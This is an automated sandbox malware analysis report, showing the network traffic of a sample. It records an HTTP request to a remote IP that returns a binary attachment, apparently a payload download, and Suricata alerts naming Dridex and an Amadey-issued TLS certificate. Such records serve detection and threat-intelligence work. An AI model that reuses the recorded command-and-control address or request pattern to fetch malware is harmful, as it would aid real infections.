Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
- TCP Requests
- UDP Requests

Source | Destination |
---|---|
192.168.56.101:62324 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:49152 | 239.255.255.250:3702 |
192.168.56.101:62325 | 239.255.255.250:3702 |
192.168.56.101:62445 | 239.255.255.250:1900 |
192.168.56.101:62447 | 239.255.255.250:3702 |
192.168.56.101:62449 | 239.255.255.250:3702 |
52.231.114.183:123 | 192.168.56.101:123 |
Method | Status | URL |
---|---|---|
GET | 200 | https://35.166.81.240/waters/travel/new21 |

Request:

GET /waters/travel/new21 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0
update: /waters/travel/new21
Host: 35.166.81.240

Response:

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Content-Type: application/octet-stream
Content-Length: 123392
Connection: keep-alive
Date: 2021-03-25 08:42:08
X-Tag: 2
Set-Cookie: allocated=565747
Set-Cookie: xPid=wiDSBKJNl5A24LcxQC7Utc%2BmcItxRdjaQCqj73JWcRqzRPITEn%2FsY22xqlvNk4XkhFDt3tK3b8WcfeD%2FXNgIT1mmv3JGSwBDSVJmrZtiVgMT8QhSvkOSZlmhpibajgc7
Set-Cookie: blocked=WB15jC3QuxWFFqWUBM1ZKDzyDHDqyu5o_i78OXXbmAs_y9UGJ3-bFY1UotqEGF7d4IH41FsuHGz0KwSgxbxODup7tRxpRIolX_fbaJU72hXnKLTYF-0ZiqaozxwfkgwSW43AV9D_wZWDoagI9tUKshEyjWBm6_g00T8zg6OqtdchpkxKqkLEtdHNxp1b7KQQNas-HkwqOyXCJ2d6PHXEC5DZeEs4fvjrdXQwfK_2KRKaxUbBWYWfBOPtM8-dbw0c
Set-Cookie: dSID=stK9EftSV8TkjZgsHjJ3YgvQX5ApyFSC47wGeusbylOJqk14lude2ONdf8d1M5_JkXdA1O5tD5YypBofIzHnUtUl0MiIWSqtxjKQrdHmX7wRkVAFcWYA_faltwvD1V0qfLd0WVZER4qsP2Q3W_6FKASAyMoISkNdosepLwz-Xc_leJ_t4Zn2wLHF2__fgqM0EeTiskMh1banivtkbV32lRcl8H1UsDNruYEZU5bYr2Hu-8Xce4IlJfpbRuZa7nKG
Vary: Accept
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment; filename="UagvqorwkJUiV-tZtRlv"
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49213 -> 35.166.81.240:443 | 2028401 | ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex | Unknown Traffic |
TCP 35.166.81.240:443 -> 192.168.56.101:49213 | 2023476 | ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | A Network Trojan was detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49213 -> 35.166.81.240:443 | C=AT, ST=Bohn, L=Bohn, O=Amadey TM, OU=Amadey Org, CN=amadeamadey.at | C=AT, ST=Bohn, L=Bohn, O=Amadey TM, OU=Amadey Org, CN=amadeamadey.at | db:43:d0:55:5c:42:2f:4a:67:c8:eb:0d:da:a9:e7:13:22:8f:d9:28 |
Snort Alerts
No Snort Alerts